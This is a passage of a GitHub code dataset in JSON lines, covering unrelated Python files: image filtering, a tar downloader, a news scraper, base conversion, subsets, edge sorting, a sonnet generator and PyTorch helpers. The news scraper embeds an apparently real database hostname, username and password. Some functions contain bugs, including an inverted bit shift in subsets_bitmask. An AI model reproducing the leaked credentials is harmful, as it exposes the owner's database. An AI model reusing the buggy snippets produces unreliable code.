an_image = plt.imread('C:/Users/pk/Dropbox/Master/MMI/2. 
Semester/Bildverarbeitung/Aufgaben/2/test2.jpg');\n boxfilter = np.ones((5,5));\n boxfilter[2,2] = boxfilter[2,2]+centerIncrease;\n totalMax = 1/(25+centerIncrease);\n filtered = cv.filter2D(an_image, -1, boxfilter*totalMax)\n plt.subplot(1,2,1)\n plt.imshow(an_image)\n plt.subplot(1,2,2)\n plt.imshow(filtered)\n plt.show()\n\ndef main():\n b(0)\n #a()\n\n# function for turning picture into grey scale\ndef toGrey(image):\n return cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())","repo_name":"scorixear/bildverarbeitung","sub_path":"2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71125273123","text":"LOGLEVEL= {\n 'disable' : 0,\n 'fatal' : 1,\n 'error' : 2,\n 'warning' : 3,\n 'info' : 4,\n 'debug' : 5,\n 'trace' : 6,\n}\n\nVCS_DIRS = ['CVS', '.svn', '.hg']\n\nLIBNAME_SEP = \"_\"\n\nBIN_PATH = 'bin'\nLIB_PATH = 'lib'\nRC_PATH = 'rc'\nTEST_PATH = 'test'\n\nCXX_SOURCE_EXT = ['cpp','cxx','c','C']\nCXX_HEADER_EXT = ['hpp','hxx','h','H']\n\nPRJ_OPT_DIR = 'bin'\nOPTS_FILE = 'build.options'\n\nSYSTEM_DEFAULT_TOOL = {\n \"linux\" : \"g++\" ,\n \"darwin\" : \"g++\" ,\n \"windows\" : \"msvc\",\n }\n\nWINDOWS = 'win'\nLINUX = 'nux'\nMACOSX = 'osx'\n\nSYSTEMS_RACY_NAMES = { \n 'linux' : LINUX,\n 'darwin' : MACOSX,\n 'windows' : WINDOWS,\n }\n","repo_name":"cfobel/sconspiracy","sub_path":"Python/racy/renv/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71401334563","text":"#!/usr/bin/python3\n\nimport tarfile\nimport json\nimport os\nimport shutil\nimport requests\nfrom requests.exceptions import HTTPError\n\nclass DownloadMaster(object):\n '''\n DownloadMaster - класс для управления контентом (загрузка, распаковка, удаление, состояние)\n При инициализации объекта необходимо подать уникальный его уникитальный номер в виде строки\n '''\n def __init__(self, id_arh: str, chunk_size = 1024) -> None:\n self.chunk_size = chunk_size\n self.id = id_arh\n self.status_list = ['downloading', 'unpacking', 'ok', 'deleting', 'unknown']\n self.status = self.status_list[-1]\n\n def download(self, url: str) -> None:\n \"\"\"\n download - функция загрузки архива\n На вход получает url-адрес и загружает архив\n При неудаче в знании статуса возращает строку с ошибкой\n \"\"\"\n self.url = url\n self.file_name = self.id+'.tar.gz'\n self.download_pe_cent = 0\n try:\n response = requests.get(self.url, stream=True)\n response.raise_for_status()\n if response.status_code == 200:\n if response.headers['Content-Type'] == 'application/octet-stream':\n Content_Length = int(response.headers['Content-Length'])\n with open(self.file_name, 'wb') as f:\n for i, chunk in enumerate(response.iter_content(chunk_size=self.chunk_size)):\n if chunk:\n f.write(chunk)\n self.status = self.status_list[0]\n self.download_pe_cent = int(i*self.chunk_size / Content_Length *100)\n except HTTPError as http_err:\n self.status = f'HTTP error occurred: {http_err}'\n except Exception as err:\n self.status = f'Other error occurred: {err}'\n else:\n self.extract()\n self.status = self.status_list[2]\n\n def extract(self) -> None:\n '''\n extract - функция извлечения данных из архива\n '''\n with tarfile.open(self.file_name) as tar:\n self.status = self.status_list[1]\n self.files = tar.getnames()\n tar.extractall(path=self.id)\n\n def 
delete_arh(self) -> None:\n '''\n delete_arh - функция удаления архива и распакованных файлов\n '''\n self.status = self.status_list[3]\n os.remove(os.path.join(os.getcwd(), self.file_name))\n arh_unpack_dir = os.path.join(os.getcwd(), self.id)\n shutil.rmtree(arh_unpack_dir)\n\n def get_status(self) -> str:\n '''\n get_status - функция получения текущего состояния контента\n '''\n status = {'id':self.id}\n if self.status == self.status_list[0]:\n status['status'] = self.status\n status['progress'] = self.download_pe_cent\n elif self.status == self.status_list[2]:\n status['status'] = self.status\n status['files'] = self.files\n else:\n status['status'] = self.status\n return json.dumps(status)\n\n\nif __name__ == '__main__':\n # Тестирование работы\n url ='http://download.ispsystem.com/OSTemplate/new/latest/Debian-7-i386-5.57-20170910000.tar.gz'\n dm = DownloadMaster('20170910000')\n dm.download(url)\n dm.delete_arh()\n","repo_name":"Che3108/test_ispsystem","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"16785975245","text":"from unittest import TestCase\n\nimport json\n\n\nclass TestPSLJson(TestCase):\n def test_to_json(self):\n # complex types need a to_json method\n json_dict = json.dumps({'field_1': 'value_1',\n 'field_2': 'value_2'})\n assert 'value_1' in json_dict\n assert 'value_2' in json_dict\n","repo_name":"DEV3L/python-json-serialization-examples","sub_path":"python_json_serialization_examples/tests/unit/test_psl_json.py","file_name":"test_psl_json.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"70249769441","text":"import mysql.connector\nimport requests\nimport time\nimport datetime\nimport random\nfrom bs4 import BeautifulSoup\nimport module_news_comTag\nimport module_news_govTag\nimport module_news_topicTag\nimport module_logWriter as lw\n\n\ndef minorRandomPause():\n randomTime = random.randint(600, 900)\n lw.log_writer('东方财富脚本进入休眠' + str(randomTime) + '秒')\n time.sleep(randomTime)\n\ndef connectDB():\n mydb = mysql.connector.connect(host='rm-bp11g1acc24v9f69t1o.mysql.rds.aliyuncs.com',\n user='rayshi',\n password='Rayshi1994!',\n database='ttd',\n auth_plugin='mysql_native_password')\n\n \n print('DB is connected')\n print()\n return mydb\n\ndef parsingContent(link):\n t = time.localtime()\n news_date = str(t.tm_year) + '-' + str(t.tm_mon) + '-' + str(t.tm_mday) + '-' + str(t.tm_hour) + '-' + str(t.tm_min)\n title = ''\n content = ''\n\n fullLink = 'http://fund.eastmoney.com/a/' + link\n try:\n p = requests.get(fullLink)\n s = BeautifulSoup(p.content, features = 'html.parser')\n except:\n lw.log_writer('东方财富脚本爬取' + fullLink + '失败')\n return {'news_link': fullLink.strip(), 'news_title': title.strip(), 'news_source': '东方财富基金资讯', 'news_content': content.strip(), 'news_date': news_date}\n\n lw.log_writer('东方财富脚本开始爬取' + fullLink)\n\n\n\n try: # 爬取标题\n title = s.find('h1').text.replace('\\n', '')\n except:\n lw.log_writer('东方财富脚本爬取标题错误')\n\n try:\n contentList = s.findAll('div', {'id': 'ContentBody'})[0].findAll('p')\n for p in contentList:\n if len(p.text) > 5 and p.find('img') is None:\n content += '
' + p.text.replace('\\n', '') + '
'\n else:\n pass\n except:\n lw.log_writer('东方财富脚本爬取内容错误')\n\n\n\n rst = {'news_link': fullLink.strip(), 'news_title': title.strip(), 'news_source': '东方财富基金资讯',\n 'news_content': content.strip(), 'news_date': news_date}\n\n return rst\n\ndef main():\n print('天天基金网新闻')\n print()\n\n # ============= 测试Connection =============\n mydb = connectDB()\n mycursor = mydb.cursor()\n mycursor.execute('SELECT * FROM ttd.news LIMIT 10;')\n print(len(mycursor.fetchall()), ' Connection works')\n print()\n # ============= 测试Connection END =============\n\n r = requests.get('http://fund.eastmoney.com/a/cjjyw.html')\n soup = BeautifulSoup(r.content, features = 'html.parser')\n\n # ============== 主页面爬取 ==============\n main_list = soup.find('div', {'class': 'mainCont'}).findAll('ul') # 此处包含页面4个ul\n main_page_item = {} # 用于储存全部该页面的数据\n \n for i in main_list:\n currentUl = i.findAll('a')\n for a in currentUl:\n main_page_item[a.text] = a.get('href')\n\n print('共', len(main_page_item), '个结果')\n print()\n # ============== 主页面爬取 END ==============\n\n # ============== 数据库对照 =================\n confirmed_new = []\n for a in main_page_item:\n try:\n sql = 'SELECT news_id, news_title FROM ttd.news WHERE news_title=\\'' + str(a) + '\\';'\n mycursor.execute(sql)\n compareResult = mycursor.fetchall()\n if len(compareResult) == 0:\n confirmed_new.append(main_page_item[a])\n else:\n pass\n except:\n lw.log_writer('东方财富脚本首页添加新闻错误')\n pass\n\n lw.log_writer('东方财富脚本本轮新增新闻有' + str(len(confirmed_new)) + '条')\n # ============== 数据库对照 END =================\n\n # ============== 爬取主代码 =================\n if len(confirmed_new) == 0:\n print('没有发现新增新闻,即将关闭DB链接')\n print()\n mydb.close()\n else:\n for link in confirmed_new:\n sql = 'INSERT INTO ttd.news (news_title, news_source, news_date, news_content, news_link, gov_tag, com_tag, topic_tag) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)'\n rst = parsingContent(link)\n # ======= 标签 - 新增 12.15 ==========\n gov_tag = module_news_govTag.tagGov(mycursor, str(rst['news_title']), str(rst['news_content']))\n com_tag = module_news_comTag.tagCom(mycursor, str(rst['news_title']), str(rst['news_content']))\n topic_tag = module_news_topicTag.tagTopic(mycursor, str(rst['news_title']), str(rst['news_content']))\n # ======= 标签 - 新增 12.15 END ==========\n val = (str(rst['news_title']), str(rst['news_source']), str(rst['news_date']), str(rst['news_content']), str(rst['news_link']), gov_tag, com_tag, topic_tag)\n try:\n mycursor.execute(sql, val)\n mydb.commit()\n except:\n lw.log_writer('东方财富脚本在添加数据时失败')\n lw.log_writer('东方财富脚本新增' + str(mycursor.rowcount) + '条')\n minorRandomPause()\n \n lw.log_writer('东方财富脚本轮结束')\n mydb.close()\n # ============== 爬取主代码 END =================\n \n\nif __name__ == \"__main__\":\n main()","repo_name":"JeTurkey/cloud-parser","sub_path":"sourceCode/parser_eastFund.py","file_name":"parser_eastFund.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71220304802","text":"def convert_decimal(n, base):\n if n == 0:\n return '0'\n digits = '0123456789ABCDEF'\n remainders = []\n negative = False\n if n < 0:\n negative = True\n n = -1 * n\n while n != 0:\n r = n % base\n n = n // base\n remainders.append(r)\n # print(r, n, remainders)\n ans = ''.join(digits[r] for r in reversed(remainders))\n if negative:\n ans = '-' + ans\n return ans\n\n\ndef convert_to_decimal(n, base):\n if n == 0:\n return 0\n digits = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, 
'9': 9, 'A': 10, 'B': 11, 'C': 12, 'D': 13, 'E': 14, 'F': 15}\n ans = 0\n power = 0\n while n:\n ans = ans + digits[n[-1]] * (base ** power)\n n = n[:-1]\n power += 1\n return ans\n\n\nif __name__ == '__main__':\n assert convert_decimal(10, 2) == '1010', '1010'\n assert convert_decimal(10, 16) == 'A', 'A'\n assert convert_decimal(10, 10) == '10', '10'\n\n assert convert_to_decimal('1010', 2) == 10, '10'\n assert convert_to_decimal('ABCDE', 16) == 703710, '703710'\n assert convert_to_decimal('ABCDE', 15) == 546284, '546284'\n","repo_name":"avshirod/codes","sub_path":"convert_decimal_to_base.py","file_name":"convert_decimal_to_base.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34571257314","text":"import itertools as it\nimport copy\n\n\ndef unlist(nested_list):\n return list(it.chain.from_iterable(nested_list))\n\n\ndef get_valid_starting_vertex(edges: [(int, int)], starting_vertex: int = None) -> int:\n \"\"\"\n A function to either obtain a valid starting vertex from a list of edges, or ensure the provided starting vertex is\n indeed a valid choice, i.e. that the provided list of edges is either a cycle of edges or a sequence with two\n defined end-points\n :param edges: a list of (unsorted) edges as tuples to be sorted\n :param starting_vertex: an optional single integer vertex at which to start the sorting\n :return: the integer identifier of the starting vertex\n \"\"\"\n\n # Extract a list of vertices from the list of edges\n vertices = unlist(edges)\n\n # If a starting vertex is provided, ensure it actually exists in the vertex list\n if starting_vertex is not None:\n assert starting_vertex in vertices, \\\n f\"Providing starting vertex {starting_vertex} is not in edge's vertex set {vertices}.\"\n\n # Count the number of occurences of each vertex in the list of vertices\n vertex_counts = {vertex: 0 for vertex in list(set(vertices))}\n for vertex in vertices:\n vertex_counts[vertex] += 1\n\n # Count the number of \"knots\" and \"forks\" in the edge sequence\n forks = [node for node, count in vertex_counts.items() if count > 2]\n assert len(forks) == 0, \\\n f\"Edge Sequence has no unique order, as nodes {forks} are featured more than twice.\"\n\n # Count the number of ends in the sequence is only 2, or all vertices must appear exactly twice\n ends = [node for node, count in vertex_counts.items() if count == 1]\n cycles = [node for node, count in vertex_counts.items() if count == 2]\n assert (len(ends) == 2) or (len(cycles) == len(vertex_counts)), \\\n f\"Edge sequence has too many or too few end vertices, as nodes {ends} all only appear once, or the number\" \\\n f\"of double matched vertices, {len(cycles)} is not the length of the available nodes {len(vertex_counts)}\"\n\n # If the starting vertex is provided, ensure that it corresponds to end point vertex\n if (starting_vertex is not None) and (len(ends) > 0):\n assert starting_vertex in ends, \\\n f\"Provided starting vertex {starting_vertex} not a valid selection from end points {ends}.\"\n\n # Return a starting vertex if it was provided and is legal\n if starting_vertex is not None:\n return starting_vertex\n\n # If a legal sequence of edges was provided, return one of its end-points\n elif len(ends) > 0:\n return ends[0]\n\n # If a legal cycle was provided, return an (effectively) random vertex\n else:\n return vertices[0]\n\n\ndef get_first_edge(edges: [(int, int)], starting_vertex: int) -> (int, int):\n \"\"\"\n A 
function which returns an edge which features the provided starting vertex in its first position\n :param edges: a list of (unsorted) edges as tuples to be sorted\n :param starting_vertex: an optional single integer vertex at which to start the sorting\n :return: a sorted list of edges\n \"\"\"\n\n # Iterate over all edges in set\n for edge in edges:\n\n # Check whether first vertex of edge is the starting vertex\n if edge[0] == starting_vertex:\n return edge\n\n # Check whether second vertex of edge is the starting vertex\n elif edge[1] == starting_vertex:\n return edge[1], edge[0]\n\n # Provided starting vertex Mapped to no edge\n assert True, f\"Starting Vertex {starting_vertex} mapped to no edge {edges}\"\n\n\ndef get_ordered_edges(edges, starting_vertex: int = None) -> [(int, int)]:\n \"\"\"\n A function to sort a list of edges provided as tuples, such that the second vertex of an edge corresponds to the\n first vertex of the next edge, i.e. (a, c) (c, b) (b, a)\n :param edges: a list of (unsorted) edges as tuples to be sorted\n :param starting_vertex: an optional single integer vertex at which to start the sorting\n :return: a sorted list of edges\n \"\"\"\n\n # Convert input edges to tuples to accommodate set types\n edges = [edge if type(edge) is tuple else tuple(edge) for edge in edges]\n print(f\"edges: {edges}\")\n # Get a valid starting vertex / Ensure the provided one is valid\n starting_vertex = get_valid_starting_vertex(edges, starting_vertex)\n\n # Convert list of tuples to list of frozen-sets\n remaining_edges = [frozenset(edge) for edge in edges]\n\n # Obtain an edge which features the starting vertex\n first_edge = get_first_edge(edges, starting_vertex)\n\n # Initialize the list of sorted edges, and remove first one from the remaining set\n sorted_edges = [first_edge] + [(None, None)] * (len(edges) - 1)\n remaining_edges.remove(frozenset(first_edge))\n\n # Iterate over each remaining index to be sorted\n for i in range(1, len(sorted_edges)):\n\n # Iterate over all remaining edges to be included\n for edge_set in remaining_edges:\n\n # Convert Set Edge to forward and 'reversed' edge\n f_edge = tuple(edge_set)\n r_edge = f_edge[::-1]\n\n # Check whether the forward facing edge matches the last sorted edge\n if f_edge[0] == sorted_edges[i - 1][1]:\n sorted_edges[i] = f_edge\n remaining_edges.remove(frozenset(f_edge))\n break\n\n # Check whether the 'reversed' facing edge matches the last sorted edge\n elif r_edge[0] == sorted_edges[i - 1][1]:\n sorted_edges[i] = r_edge\n remaining_edges.remove(frozenset(r_edge))\n break\n\n # Ensure no edges remain to be sorted\n assert len(remaining_edges) == 0, \\\n f\"Not all edges sorted. 
These remain: {sorted_edges}\"\n\n # Return sorted edges as list of tuples\n return sorted_edges\n\n\ndef get_vertex_sequence(edges, starting_vertex=None, is_ordered=False):\n\n # If the edges are ordered, they may not need to be sorted\n if is_ordered:\n\n # If no starting vertex is provided, the ordered edges can be taken as is\n if starting_vertex is None:\n ordered_edges = copy.deepcopy(edges)\n\n # If a starting vertex is provided, ensure it corresponds to the first vertex of the edges\n else:\n\n # If it does, the ordered edges can be utilized as is\n if edges[0][0] == starting_vertex:\n ordered_edges = copy.deepcopy(edges)\n\n # If not, re-sort the provided edges with the provided starting vertex\n else:\n ordered_edges = get_ordered_edges(edges=edges, starting_vertex=starting_vertex)\n\n # If the provided edges are not sorted, sort them using the provided starting vertex\n else:\n ordered_edges = get_ordered_edges(edges=edges, starting_vertex=starting_vertex)\n\n # Extract the vertex sequence consisting of the first vertex of each edge\n vertex_sequence = [edge[0] for edge in ordered_edges]\n print(f\"sorted vertex sequence: {vertex_sequence}\")\n\n # If the edge list is not cyclical, it must be a sequence, so append the final vertex as well\n if ordered_edges[0][0] != ordered_edges[-1][1]:\n vertex_sequence.append(ordered_edges[-1][1])\n print(f\"sorted vertex sequence post append: {vertex_sequence}\")\n\n # Return the ordered vertex sequence\n return vertex_sequence\n\n\ndef get_face_vertex_sequence(face, graph):\n # todo: does not work if edges exist between elements of the face other than the minimal cycle\n #face_edges = [None] * len(face)\n face_edges = []\n # print(f\"face: {face}\")\n for edge in graph.edges:\n # print(f\"edge: {edge}\")\n common_vertices = face.intersection(set(edge))\n if len(common_vertices) == 2: # TODO: this does not always produce the edge sequence if there is a triangle\n face_edges.append(edge)\n # print(f\"face edges: {face_edges}\")\n sorted_face_edges = sort_face_edges(face_edges)\n return sorted_face_edges\n\n\ndef sort_face_edges(edge_list):\n\n # TODO: reformulate search in terms of indeces that can be 'blacked' out because there were already included\n\n # Convert set of frozensets to list of tuples\n # TODO: make this check more robust\n edge_list = [tuple(edge) for edge in edge_list] if isinstance(edge_list, set) else edge_list\n\n # Initialize new list of sorted edges in a cycle\n new_list = [(None, None)] * len(edge_list)\n new_list[0] = edge_list[0]\n\n # Iterate over all indices to be filled\n for index in range(1, len(edge_list)):\n\n # Specify the next target value as the last vertex of the first edge\n target_value = new_list[index-1][1]\n\n # Find the next possible edge which matches the last edge's second vertex and has not yet been included\n next_element = [element for element in edge_list if (target_value in element) and\n (element not in new_list) and ((element[1], element[0]) not in new_list)][0]\n\n # Store either the original edge or its reverse depending on which allows for the cycle to continue\n reverse_edge = (next_element[1], next_element[0])\n new_list[index] = reverse_edge if reverse_edge[0] == target_value else next_element\n\n # Ensure that the found order is indeed cyclical\n assert new_list[0][0] == new_list[-1][1], \\\n \"Found sorted order of edges is not cyclical.\"\n\n # Return the sorted cycle\n return new_list\n\n\ndef get_sorted_face_vertices(edges, is_sorted=False):\n if not is_sorted:\n if not 
all(edges[index][1] == edges[(index + 1) % len(edges)] for index in range(0, len(edges))):\n edges = sort_face_edges(edges)\n return [edge[0] for edge in edges]\n","repo_name":"henry-ehlers/Edge-Crossing-Resolution-through-Vertex-Duplication","sub_path":"src/edges.py","file_name":"edges.py","file_ext":"py","file_size_in_byte":9730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17713527651","text":"# 78. Subsets\n# Given a set of distinct integers, nums, return all possible subsets (the power set).\n\n# Note: The solution set must not contain duplicate subsets.\n\n\nfrom typing import List\n\ndef subsets(nums: List[int]) -> List[List[int]]:\n \n ret = [[]]\n \n for n in nums:\n ret += [r+[n] for r in ret]\n \n return (ret)\n \n### Complexity is O(N*2^N)\n\ndef subsets_bitmask(nums: List[int]) -> List[List[int]]:\n \n ret = []\n \n n = len(nums)\n \n for s in range(1 >> n): ## 2**n == 1 >> n\n l = []\n \n ## s in binary number will be of length n where i-th place is 1 if we have to include that nums[i] \n mask = 1\n for i in range(n):\n if s & mask: l.append(nums[i])\n mask <<= 1\n ret.append(l)\n \n return (ret)\n \nif __name__ ==\"__main__\":\n import timeit\n a = timeit.timeit('subsets([1,2,3,4])', globals=globals(), number=100)\n b = timeit.timeit('subsets_bitmask([1,2,3,4])', globals=globals(), number=100)\n print(a,b)","repo_name":"rajkar86/python_coding_interviews","sub_path":"leetcode/0078_subsets.py","file_name":"0078_subsets.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42697846839","text":"# /usr/bin/env python3\n\nfrom collections import defaultdict\nimport random\nimport json\nimport os\nimport pandas as pd\n\n\ndef read_source(filename_syls):\n with open(filename_syls+\".csv\", \"r\") as data_file:\n text_syls = data_file.readlines()\n\n return text_syls\n\n\ndef final_syls_to_array(text):\n final_syls = []\n for line in text:\n # Quitar salto de linea\n tmp = len(line)\n tmp -= 1\n final_syls.append(line[:tmp])\n\n return final_syls\n\n\ndef final_syls_counter(dict_verses):\n\n counter_final_syls = {}\n\n for syl in dict_verses:\n counter_final_syls[syl] = len(dict_verses[syl])\n\n return counter_final_syls\n\n\ndef verses_by_final_syls(filename_verses, final_syls):\n\n text_verses = pd.read_csv(filename_verses+\".csv\")\n dict_verses = defaultdict(list)\n dict_verses_filter = {}\n\n i = 0\n for syl in final_syls[1:]:\n\n if syl in dict_verses.keys():\n dict_verses[syl].append(text_verses.iloc[i].verse)\n else:\n dict_verses[syl].append(text_verses.iloc[i].verse)\n i += 1\n\n dict_verses_filter = filter_by_num_verses(dict_verses)\n return dict_verses_filter\n\n\ndef filter_by_num_verses(dict_verses):\n\n filter_dict_verses = {}\n for syl in dict_verses:\n if (len(dict_verses[syl]) > 3):\n filter_dict_verses[syl] = dict_verses[syl]\n\n return filter_dict_verses\n\n\n\ndef to_json(name_datafile, name_datastructure):\n\n with open(name_datafile+\".json\", \"w\") as outfile:\n json.dump(name_datastructure, outfile)\n \n return 0\n\n\ndef homologous_final_syls(dict_verses, dict_verses_):\n\n hom_final_syls = []\n for syl in dict_verses:\n\n if ((syl in dict_verses.keys()) and (syl in dict_verses_.keys()) and (syl not in hom_final_syls)):\n hom_final_syls.append(syl)\n\n for syl_ in dict_verses_:\n\n if ((syl_ in dict_verses.keys()) and (syl_ in dict_verses_.keys()) and (syl_ not in hom_final_syls)):\n 
hom_final_syls.append(syl_)\n\n return hom_final_syls\n\n\ndef to_text(src_dir_cities, id_sonnet, city, sonnet):\n with open(src_dir_cities+\"/\"+city+\"/\"+str(id_sonnet)+\".txt\", \"w\") as sonnet_file:\n sonnet_file.write(sonnet)\n\n return 0\n\n\ndef create_sonnets(dict_verses, dict_verses_city, dict_verses_apoc, city, src_dir_cities):\n\n n_sonnets=3\n for id_sonnet in range(n_sonnets):\n\n\n # Choose de final syllabe to build the sonnets\n hom_final_syls_city = homologous_final_syls(dict_verses, dict_verses_city)\n final_syls_verse_A = random.choice(hom_final_syls_city)\n\n final_syls_verse_B = random.choice(list(dict_verses.keys()))\n\n hom_final_syls_apoc = homologous_final_syls(dict_verses, dict_verses_apoc)\n final_syls_verse_C = random.choice(hom_final_syls_apoc)\n\n final_syls_verse_D = random.choice(list(dict_verses.keys()))\n\n # Core sonnets built\n # falta verificar que no se repitan los versos, si hay solo un verso se repite 3 veces\n verse_A_city = random.choices(list(dict_verses_city[final_syls_verse_A]), k=1)\n verses_A = random.choices(list(dict_verses[final_syls_verse_A]), k=3)\n\n verses_B = random.choices(list(dict_verses[final_syls_verse_B]), k=4)\n\n verses_C = random.choices(list(dict_verses[final_syls_verse_C]), k=2)\n verse_C_apoc = random.choices(list(dict_verses_apoc[final_syls_verse_C]), k=1)\n\n verses_D = random.choices(list(dict_verses[final_syls_verse_D]), k=3)\n\n sonnet = \" \"+verse_A_city[0]+\"\\n\"+verses_B[0]+\"\\n\"+verses_B[1]+\"\\n\"+verses_A[0]+\"\\n\\n\"+verses_A[1]+\"\\n\"+verses_B[2]+\"\\n\"+verses_B[3]+\"\\n\"+verses_A[2]+\"\\n\\n\"+verses_C[0]+\"\\n\"+verses_D[0]+\"\\n\"+verses_C[1]+\"\\n\\n\"+verses_D[1]+\"\\n \"+verse_C_apoc[0]+\"\\n\"+verses_D[2]+\"\\n\"\n\n print (\"\\n\\nXXXXXXXXXXX[\"+city+\"]XXXXXXXXXXXXXXXXX\\n\")\n print (sonnet)\n\n to_text(src_dir_cities, id_sonnet, city, sonnet)\n #counter_city = \"2\"\n #with open(\"verses/\"+city+\"/\"+str(counter_city)+\".txt\", \"w\") as sonnet_file:\n # sonnet_file.write(sonnet)\n\n return sonnet\n\n\ndef main():\n\n #source_name = \"02_terminaciones\"\n\n filename_verses = \"00_versos_predicted\"\n filename_syls = \"01_terminaciones_versos\"\n text_syls = read_source(filename_syls)\n final_syls = final_syls_to_array(text_syls)\n dict_verses = verses_by_final_syls(filename_verses, final_syls)\n counter_syls = final_syls_counter(dict_verses)\n\n filename_verses_apoc = \"00_versos_apocalipsis\"\n filename_syls_apoc = \"01_terminaciones_versos_apocalipsis\"\n text_syls_apoc = read_source(filename_syls_apoc)\n final_syls_apoc = final_syls_to_array(text_syls_apoc)\n dict_verses_apoc = verses_by_final_syls(filename_verses_apoc, final_syls_apoc)\n counter_syls_apoc = final_syls_counter(dict_verses_apoc)\n\n\n src_dir_cities = \"02_sonetos_by_city\"\n os.system(\"rm -r \" + src_dir_cities)\n os.system(\"mkdir \" + src_dir_cities)\n os.system(\"bash setup.bash\")\n\n for city in os.listdir(src_dir_cities):\n if os.path.isdir(src_dir_cities+\"/\"+city):\n\n try:\n filename_verses_city = \"00_versos_by_city/\"+city+\"/00_versos_predicted_\"+city\n filename_syls_city = \"01_terminaciones_by_city/\"+city+\"/01_terminaciones_\"+city\n\n text_syls_city = read_source(filename_syls_city)\n final_syls_city = final_syls_to_array(text_syls_city)\n dict_verses_city = verses_by_final_syls(filename_verses_city, final_syls_city)\n counter_syls_city = final_syls_counter(dict_verses_city)\n\n create_sonnets(dict_verses, dict_verses_city, dict_verses_apoc, city, src_dir_cities)\n except:\n print (\"ERROR: Sonnets 
don't created to city: \"+city)\n\n else:\n print (\"ERROR: No dictories found.\")\n\n\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tenaza/NLP-sonnets_vR_3","sub_path":"sonnets/02_obtener_sonetos.py","file_name":"02_obtener_sonetos.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17596996787","text":"import logging\nimport os\nimport shutil\nfrom collections import OrderedDict\n\nimport torch\nfrom torch import distributed as dist\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.optim.lr_scheduler import LambdaLR\nfrom torch.autograd import Variable\nimport numpy as np\nimport random\nimport math\nimport warnings\n\n\ndef reduce_tensor(tensor, n):\n rt = tensor.clone()\n dist.all_reduce(rt, op=dist.ReduceOp.SUM)\n rt /= n\n return rt\n\n\ndef create_loss_fn(args):\n if args.label_smoothing > 0:\n criterion = SmoothCrossEntropy(alpha=args.label_smoothing)\n else:\n criterion = nn.CrossEntropyLoss()\n return criterion.to(args.device)\n\n\ndef module_load_state_dict(model, state_dict):\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n name = k[7:] # remove `module.`\n new_state_dict[name] = v\n model.load_state_dict(new_state_dict)\n\n\ndef model_load_state_dict(model, state_dict):\n try:\n model.load_state_dict(state_dict)\n except:\n module_load_state_dict(model, state_dict)\n\n\ndef save_checkpoint(args, state, is_best, finetune=False):\n os.makedirs(args.save_path, exist_ok=True)\n if finetune:\n name = f'{args.name}_finetune'\n else:\n name = args.name\n filename = f'{args.save_path}/{name}_last.pth.tar'\n torch.save(state, filename, _use_new_zipfile_serialization=False)\n if is_best:\n shutil.copyfile(filename, f'{args.save_path}/{args.name}_best.pth.tar')\n\n\ndef accuracy(output, target, topk=(1,)):\n output = output.to(torch.device('cpu'))\n target = target.to(torch.device('cpu'))\n maxk = max(topk)\n batch_size = target.shape[0]\n\n _, idx = output.sort(dim=1, descending=True)\n pred = idx.narrow(1, 0, maxk).t()\n correct = pred.eq(target.reshape(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].reshape(-1).float().sum(dim=0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\nclass SmoothCrossEntropy(nn.Module):\n def __init__(self, alpha=0.1):\n super(SmoothCrossEntropy, self).__init__()\n self.alpha = alpha\n\n def forward(self, logits, labels):\n num_classes = logits.shape[-1]\n alpha_div_k = self.alpha / num_classes\n target_probs = F.one_hot(labels.type(torch.int64), num_classes=num_classes).float() * \\\n (1. 
- self.alpha) + alpha_div_k\n loss = -(target_probs * torch.log_softmax(logits, dim=-1)).sum(dim=-1)\n return loss.mean()\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\n Imported from https://github.com/pytorch/examples/blob/master/imagenet/main.py#L247-L262\n \"\"\"\n\n def __init__(self, name='None', fmt=':f'):\n self.name = name\n self.fmt = fmt\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def __str__(self):\n fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\n\ndef get_cosine_schedule_with_warmup(optimizer,\n num_warmup_steps,\n num_training_steps,\n num_wait_steps=0,\n num_cycles=0.5,\n last_epoch=-1):\n def lr_lambda(current_step):\n if current_step < num_wait_steps:\n return 0.0\n\n if current_step < num_warmup_steps + num_wait_steps:\n return float(current_step) / float(max(1, num_warmup_steps + num_wait_steps))\n\n progress = float(current_step - num_warmup_steps - num_wait_steps) / 